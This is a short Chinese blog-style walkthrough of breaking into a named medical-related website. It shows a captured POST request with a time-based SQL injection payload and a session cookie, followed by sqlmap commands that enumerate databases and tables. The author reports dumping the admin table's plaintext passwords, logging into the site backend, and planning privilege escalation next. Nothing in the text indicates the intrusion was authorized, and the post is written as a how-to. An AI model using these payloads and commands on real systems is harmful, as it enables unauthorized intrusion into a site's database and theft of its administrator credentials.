今晚给一个网站做了一次入侵检测,首先进行信息刺探后,发现这个站有注入策略,所有页面都没法通过常规的注入,利用wvs扫描网站发现一个页面。
这个页面直接暴露出了错误信息,看了一下url没有参数却爆出了错误,感觉post能注入,于是抓包修改header分析了一下
RequestPOST /medresult.php HTTP/1.1Content-Length: 28Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestCookie: PHPSESSID=2ah1ottpdkcj0jgip9lgl54891Host: www.zgyijing.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)Acunetix-Scanning-agreement: Third Party Scanning PROHIBITEDAcunetix-User-agreement: http://www.acunetix.com/wvs/disc.htmAccept: */*lm=5 and sleep(2)
发现这个页面存在SQL注入漏洞,还是POST类型的注入漏洞,防了GET注入但是没有防御POST注入,于是乎。。。跑一下sqlmap
格式为:sqlmap -u http://www.xxxxx.com --data “lm=1”
发现确实是存在注入的,于是乎。。。 把表爆出来找关键的表
格式:sqlmap -u http://www.xxxxx.com --data “lm=1” --dbs
发现一个关键信息的表,这个站用的库就是 vps051,于是乎把vps051这个哭的表爆出来
格式:sqlmap -u http://www.xxxxx.com --data “lm=1” -D vps051 --tables
英语好点的同学应该猜测到管理员的表应该是master,爆出管理的表
密码竟然是明文的,省去了破解的功夫,这下得到了管理的密码,登录网站后台
接下来就可以考虑提权了。。